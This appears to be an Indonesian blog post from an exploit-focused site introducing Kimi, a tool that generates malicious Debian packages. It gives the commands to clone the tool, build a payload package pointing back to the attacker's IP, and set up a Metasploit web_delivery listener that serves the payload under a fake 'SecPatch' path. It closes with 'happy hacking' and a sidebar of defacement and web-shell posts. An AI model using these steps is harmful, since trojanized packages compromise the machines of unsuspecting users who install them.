• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar

LinuxSec Exploit

Nothing is Ever Locked

  • XSS Payloads
  • About Us

Kimi – Malicious Debian Package Generator

February 28, 2017 by Jack Wilder Leave a Comment

Kimi adalah tool yang ditulis dengan bahasa python oleh ChaitanyaHaritash. Tool ini berguna untuk membuat payload berekstensi .deb (paket debian).

Menurut pembuatnya, nama Kimi sendiri diambil dari salahsatu karakter di serial Naruto, “Kimimaro”.
Karena fungsinya untuk membuat paket debian, jelas target nya adalah sistem operasi Debian dan turunannya.
Kelebihan Kimi :
  • Independen. Artinya tool ini tidak membutuhkan aplikasi lain.
  • Dapat diintegrasikan dengan payload generator lain.

Get Start

git clone https://github.com/ChaitanyaHaritash/kimi.git

cd kimi

sudo python kimi.py -h

Cara membuat payload :

sudo python kimi.py -n nama paket -l ip kita -V versi software

Setting up Web_Delivery di msf :


msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set srvhost 192.168.0.102
srvhost => 192.168.0.102
msf exploit(web_delivery) > set uripath /SecPatch
uripath => /SecPatch
msf exploit(web_delivery) > set Lhost 192.168.0.102
Lhost => 192.168.0.102
msf exploit(web_delivery) > show options
msf exploit(web_delivery) > exploit

Oke sekian tutorial kali ini, happy hacking 😉 .
Shares

Filed Under: Tools Tagged With: Exploit, Metasploit, Python

Reader Interactions

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Popular Post

Tumblr Custom Domain or Subdomain Takeover

Prestashop Module Blocktestimonial File Upload Auto Exploit

Upload Backdoor Lewat MySQL Database (phpMyAdmin)

Exploit WordPress N-Media Website Contact Form with File Upload 1.3.4 Shell Upload Vulnerability

CVE-2019-13360 – CentOS Control Web Panel Authentication Bypass

MIME Type Sniffing pada Form Upload Gambar

Deface WordPress dengan Exploit Themes Qualifire File Upload Vulnerability

FastMail Custom Domain or Subdomain Takeover

Download 1n73ct10n / 1n73ction Privat Web Shell by X’1N73CT

Exploit Drupal Core 7.x Auto SQL Injection dan Upload Shell

LinuxSec / 83 queries in 0.18 seconds